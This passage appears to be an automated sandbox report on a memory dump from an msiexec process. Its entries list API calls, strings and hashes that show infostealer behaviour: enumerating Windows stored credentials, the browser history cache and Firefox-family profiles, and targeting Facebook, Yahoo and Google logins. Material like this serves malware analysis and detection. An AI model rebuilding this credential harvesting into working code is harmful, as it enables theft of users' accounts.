                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                            • API String ID: 2941347001-70141382
                                                                            • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                            • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                            • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                            • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                            • String ID:
                                                                            • API String ID: 2827331108-0
                                                                            • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                            • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                            • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                            • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040C298
                                                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                            • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                            • wcschr.MSVCRT ref: 0040C324
                                                                            • wcschr.MSVCRT ref: 0040C344
                                                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                            • GetLastError.KERNEL32 ref: 0040C373
                                                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                            • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                            • String ID: visited:
                                                                            • API String ID: 1157525455-1702587658
                                                                            • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                            • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                            • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                            • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                            APIs
                                                                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                            • memset.MSVCRT ref: 0040E1BD
                                                                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                            • free.MSVCRT ref: 0040E28B
                                                                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                              • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                              • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                            • _snwprintf.MSVCRT ref: 0040E257
                                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                            • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                            • API String ID: 2804212203-2982631422
                                                                            • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                            • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                            • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                            • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                            APIs
                                                                              • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                              • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                              • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                            • memset.MSVCRT ref: 0040BC75
                                                                            • memset.MSVCRT ref: 0040BC8C
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                            • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                            • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                            • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                            • String ID:
                                                                            • API String ID: 115830560-3916222277
                                                                            • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                            • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                            • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                            • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                              • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                              • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                              • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                              • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                              • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                              • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                            • _wcslwr.MSVCRT ref: 0040C817
                                                                              • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                              • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                            • wcslen.MSVCRT ref: 0040C82C
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                            • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                            • API String ID: 2936932814-4196376884
                                                                            • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                            • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                            • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                            • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                            • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                            • wcslen.MSVCRT ref: 0040BE06
                                                                            • wcsncmp.MSVCRT ref: 0040BE38
                                                                            • memset.MSVCRT ref: 0040BE91
                                                                            • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                            • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                            • wcschr.MSVCRT ref: 0040BF24
                                                                            • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                            • String ID:
                                                                            • API String ID: 697348961-0
                                                                            • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                            • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                            • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                            • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • memset.MSVCRT ref: 00403CBF
                                                                            • memset.MSVCRT ref: 00403CD4
                                                                            • memset.MSVCRT ref: 00403CE9
                                                                            • memset.MSVCRT ref: 00403CFE
                                                                            • memset.MSVCRT ref: 00403D13
                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                            • memset.MSVCRT ref: 00403DDA
                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                            • String ID: Waterfox$Waterfox\Profiles
                                                                            • API String ID: 1829478387-11920434
                                                                            • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                            • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                            • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                            • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00403E50
                                                                            • memset.MSVCRT ref: 00403E65
                                                                            • memset.MSVCRT ref: 00403E7A
                                                                            • memset.MSVCRT ref: 00403E8F
                                                                            • memset.MSVCRT ref: 00403EA4
                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                            • memset.MSVCRT ref: 00403F6B
                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                            • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                            • API String ID: 1829478387-2068335096
                                                                            • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                            • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                            • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                            • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00403FE1
                                                                            • memset.MSVCRT ref: 00403FF6
                                                                            • memset.MSVCRT ref: 0040400B
                                                                            • memset.MSVCRT ref: 00404020
                                                                            • memset.MSVCRT ref: 00404035
                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                            • memset.MSVCRT ref: 004040FC
                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                            • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                            • API String ID: 1829478387-3369679110
                                                                            • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                            • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                            • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                            • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                            APIs
                                                                            • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy
                                                                            • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                            • API String ID: 3510742995-2641926074
                                                                            • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                            • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                            • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                            • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                            • GetLastError.KERNEL32 ref: 0041847E
                                                                            • free.MSVCRT ref: 0041848B
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: CreateErrorFileLastfree
                                                                            • String ID: |A
                                                                            • API String ID: 981974120-1717621600
                                                                            • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                            • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                            • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                            • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                            APIs
                                                                              • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                              • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                              • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                            • memset.MSVCRT ref: 004033B7
                                                                            • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                            • wcscmp.MSVCRT ref: 004033FC
                                                                            • _wcsicmp.MSVCRT ref: 00403439
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                            • String ID: $0.@
                                                                            • API String ID: 2758756878-1896041820
                                                                            • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                            • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                            • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                            • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                            APIs
                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                            • String ID:
                                                                            • API String ID: 2941347001-0
                                                                            • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                            • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                            • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                            • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00403C09
                                                                            • memset.MSVCRT ref: 00403C1E
                                                                              • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                              • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                            • wcscat.MSVCRT ref: 00403C47
                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                            • wcscat.MSVCRT ref: 00403C70
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memsetwcscat$wcscpywcslen
                                                                            • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                            • API String ID: 2489821370-1174173950
                                                                            • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                            • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                            • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                            • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040A824
                                                                            • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                            • wcscpy.MSVCRT ref: 0040A854
                                                                            • wcscat.MSVCRT ref: 0040A86A
                                                                            • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                            • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                            • String ID:
                                                                            • API String ID: 669240632-0
                                                                            • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                            • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                            • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                            • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                            APIs
                                                                            • wcschr.MSVCRT ref: 00414458
                                                                            • _snwprintf.MSVCRT ref: 0041447D
                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                            • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                            • String ID: "%s"
                                                                            • API String ID: 1343145685-3297466227
                                                                            • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                            • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                            • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                            • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                            APIs
